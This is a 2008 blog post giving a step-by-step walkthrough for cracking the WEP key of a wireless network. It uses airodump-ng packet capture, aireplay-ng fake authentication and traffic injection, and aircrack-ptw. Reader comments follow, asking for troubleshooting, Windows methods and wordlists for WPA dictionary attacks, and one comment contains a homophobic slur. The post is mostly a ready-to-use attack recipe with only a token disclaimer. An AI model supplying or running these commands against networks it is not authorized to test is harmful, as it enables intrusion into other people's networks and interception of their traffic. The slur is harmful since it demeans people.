Hacking Wireless Keys – WEP

by Lalit Kapoor on 2008-04-212008-04-21T09:44:43ZY-m-d">April 21, 20082008-04-21T09:44:43ZF j, Y

Disclaimer: This is for Educational purposes only. I am not responsible for how you or anyone else uses the following information. Check the laws in your country.

In order to hack a wireless network secured with WEP you will need a few tools:

  • A wireless card that can go into monitor mode (I have an Intel PRO/Wireless 3945ABG)
    • Note: To do dump data and crack the key in Windows I would recommend OmiPeek Personal to capture the data (it will put your driver in monitor mode and restore it when you close the application) and the driver in the note below
    • Note: For my wireless card I needed to get an older driver. This older driver supports the much needed monitor mode. If you need this driver I have hosted it here. This is for Windows. However, this tutorial will teach you how to crack it in Linux via a Live CD.
  • A linux live CD (I used: WifiWay version 1.0 Beta2 from here)
    • After booting up type in: startx
      • Note: All the text will be in Spanish. Go to the KDE menu and change the regional/language settings to English if you need to. Also in the taskbar in the bottom right change the flash from Spain’s flag to the U.S. flag if you desire to be able to use the US keyboard properly in the terminal.
  • airodump-ng – To dump the packets to a file
  • aireplay-ng – To increase the data packets
  • airocrack-ptw – To crack the password

Now that you have all these tools you will need to do the following (Assuming you are using the WifiWay CD):

  1. Type in a terminal: airodump-ng rtap0
  2. Type in another terminal: airodump-ng -w packets rtap0 to start dumping the packets
  3. Type in another terminal: ifconfig wifi0 up
  4. Type: ifconfig to Get our MAC address
  5. Type in another terminal: aireplay-ng -1 0 -a BSSID -h Our MAC -e ESSID wifi0 this is to do a handshake
  6. Type: aireplay-ng -3 -b BSSID -e ESSID -h Our MAC wifi0 this is to inject more traffic (drive up the number of packets)
  7. once you have alot of packets (over 250,000 is recommended for the highest possible bit wep key) type in aircrack-ptw packets.cap
  8. Voila you have the key. It is in hex format.
  9. If you need to do a hex to ascii coversion you can do it here.

Note: If you want to crack WPA, it is the same thing, except when you crack it, you will need to use a dictionary attack. If anyone really wants me to walk through this I will, just leave a comment.

Tagged as: hacking, security, wireless

  • La Azara
    Thanks Lalit, that old driver is a genius. I was about to loose my temper as Intel 3945 didn't allow MAC spoofing, now its back to where it belongs: A hardware to perform as it is told to and not ruled by old Intel faggots.
  • Iulian
    Hy, Lalit
    I get to the step: "Type in another terminal: aireplay-ng -1 0 -a BSSID -h Our MAC -e ESSID wifi0 this is to do a handshake", and then gives me an error, as invalid MAC, and the MAC is good, because i verified it in my vista system with command getmac, and here it-s says that is disconnected(in vista).I think that in live Linux CD my MAC is turned off.How can i make it work? I look forward for your answer! Thank you!
    Best regards, Iulian!!
  • ajith
    Hai lalit ,
    can i get a simple step by step tutorials of web key viewing.

    Thanks
  • @violator: Try an Ubuntu's live CD (8.10) it will support your driver out of the box.
  • violator
    hi. i have been trying to install 3945 drivers on linux but not happening. what is linux live cd? where can i download it? any luck with hacking wep networks in windows?
  • @siju: Why don't you just use a linux live cd? I've had problems getting 3945 to get into promiscuous mode in windows, let me know if you find a working windows solution.
  • siju
    hi there...could u help me...i need 2 crack a WEP secured network using windows.....i tried using airodump..but it shows no network adapter detected...im using an Intel PRO/Wireless 3945ABG...i even tried the driver u mentioned...still....cud ya gimme a guide on doin t in windows.....tnx a lot....
  • @Help: it may be called packet.cap01 or something else, look for the file that just got created, that is most likely your capture file.
  • Help
    Also when I try to do aircrack-ptw packets.cap it says could not open file.
  • Help
    I am trying to get this working on my wireless network and have not been able to succeed. I get to the part where it says "Type in another terminal: aireplay-ng -1 0 -a BSSID -h Our MAC -e ESSID wifi0 this is to do a handshake". When I type this in I get "sending authentication request (open system)" until finally it fails with "attack was unsuccessful". The first time I run in it though the first time it gives me the message it says "ack" next to one and then it keeps going with the sending authentication request. I am using the same setup you are (ex. wireless card and wifiway 1.0 beta). I was hoping that you could help.
  • @m1hn34: for A dictionary try the all.gz file here: ftp://ftp.ibiblio.org/pub/linu...
  • m1hn34
    hello...i cracked wep keys..now i want to go further and crack wpa
    the problem is that i cannot find a good dictionary...can you help me pls?
blog comments powered by Disqus

Previous post:

Next post: